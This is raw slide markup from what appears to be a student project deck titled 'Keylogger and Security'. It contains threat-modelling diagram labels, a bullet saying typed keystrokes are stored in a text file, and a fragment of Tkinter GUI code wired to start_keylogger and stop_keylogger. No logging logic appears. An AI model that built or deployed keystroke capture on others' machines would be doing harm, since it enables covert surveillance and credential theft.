          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1300" kern="1200" dirty="0"/>
            <a:t>result</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="501611" y="2976376"/>
        <a:ext cx="672282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71404-EF73-4A6D-9EAE-1F4F778E3C9D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2944115" y="1983955"/>
          <a:ext cx="1924917" cy="86534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a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="3100" kern="1200" dirty="0"/>
            <a:t>Modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2986358" y="2026198"/>
        <a:ext cx="1840431" cy="780860"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA583868-6DD2-44F6-855A-A89772E52EC8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="3400546" y="1477927"/>
          <a:ext cx="1012055" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="101205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F8186B-2B8D-44C3-8AE3-F31931274D54}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3111078" y="415"/>
          <a:ext cx="1590990"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Threat modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3158502" y="47839"/>
        <a:ext cx="1496142" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B02D8259-CDC0-47D3-A863-C8774AA360BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20082078">
          <a:off x="4792714" y="1853671"/>
          <a:ext cx="609745" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="60974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E399BE-B206-4F07-B505-EA114E8709C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5373221" y="768935"/>
          <a:ext cx="1983247"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IN" sz="2400" kern="1200" dirty="0"/>
            <a:t>Attack chain analysis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5420645" y="816359"/>
        <a:ext cx="1888399" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F63DAE2A-CEE0-4F00-B8C0-372D6A837670}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="1187838">
          <a:off x="4862830" y="2798621"/>
          <a:ext cx="209852" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="20985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F25F-DA15-4F88-8741-0BA693E99B42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5066481" y="2692672"/>
          <a:ext cx="1912697"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Behavioural modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5113905" y="2740096"/>
        <a:ext cx="1817849" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E05F3E78-0E8B-4B4B-B2FD-55CE37D794F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3400546" y="3355329"/>
          <a:ext cx="1012055" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1012055"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37CD28-FC83-4DC0-BF2D-E597C22BBFE3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2701976" y="3861356"/>
          <a:ext cx="2409194"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IN" sz="2700" kern="1200" dirty="0"/>
            <a:t>Risk assessment</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2749400" y="3908780"/>
        <a:ext cx="2314346" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E5184D91-0271-4994-9CE3-FE5CD5499900}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="9863928">
          <a:off x="2304641" y="2772977"/>
          <a:ext cx="651474" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="651474"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E58558-683E-4BCF-BFD6-C928B467795F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="670831" y="2604616"/>
          <a:ext cx="1645811"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a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" kern="1200" dirty="0"/>
            <a:t>Network traffic analysis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="718255" y="2652040"/>
        <a:ext cx="1550963" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E32A33EE-A661-49C7-BF3E-8A1F45288B12}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="12528216">
          <a:off x="2390204" y="1796638"/>
          <a:ext cx="777557" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="777557"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8EAF0-925D-49B0-9672-70230676BA6C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="791076" y="670725"/>
          <a:ext cx="1647229" cy="97148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marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1111250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="2500" kern="1200" dirty="0"/>
            <a:t>Scenario modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="838500" y="718149"/>
        <a:ext cx="1552381" cy="87663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145284F-5CA7-4F9C-9178-B57AA3CAF91E}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>24-06-2024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C59E6E6-AA52-4FC6-9E02-7DEAFB8870EB}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2939452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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210367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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748641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C59E6E6-AA52-4FC6-9E02-7DEAFB8870EB}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253603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92754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630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6561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4339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45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4797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6205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6077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6493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369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02103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5525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9764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6703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6065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174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6/24/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4036242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6/24/2024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457068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 id="214748392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67000" y="129263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943100" y="246129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85800" y="3225448"/>
            <a:ext cx="6324600" cy="509114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3213735">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>M LEELA SAI</a:t>
            </a:r>
            <a:endParaRPr spc="15" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Sitka Small Semibold" pitchFamily="2"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1</a:t>
            </a:fld>
            <a:endParaRPr spc="10" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="4458113"/>
            <a:ext cx="6324600" cy="1331134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>FINAL PROJECT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="28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D83A-16FC-0DC4-8AE2-AB8B86C0FD4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="990600"/>
            <a:ext cx="10681335" cy="3077766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(side=LEFT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55F5ED2-416E-6A73-374B-95553742245C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="3581400"/>
            <a:ext cx="2392887" cy="2629128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272241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228600" y="958807"/>
            <a:ext cx="10681335" cy="570669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WOW</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="85" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IN</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YOUR</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOLUTION</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE112B5-808D-8A68-D162-6AD0F842AAC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2362200"/>
            <a:ext cx="6334126" cy="2462213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1"/>
              <a:t>secuetre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t> accounts in a system or computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>In this solution the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1"/>
              <a:t>muose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t> and keyboard control and it store in a txt file what we type on keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="320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562614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228600" y="304800"/>
            <a:ext cx="3303904" cy="567463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-30" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
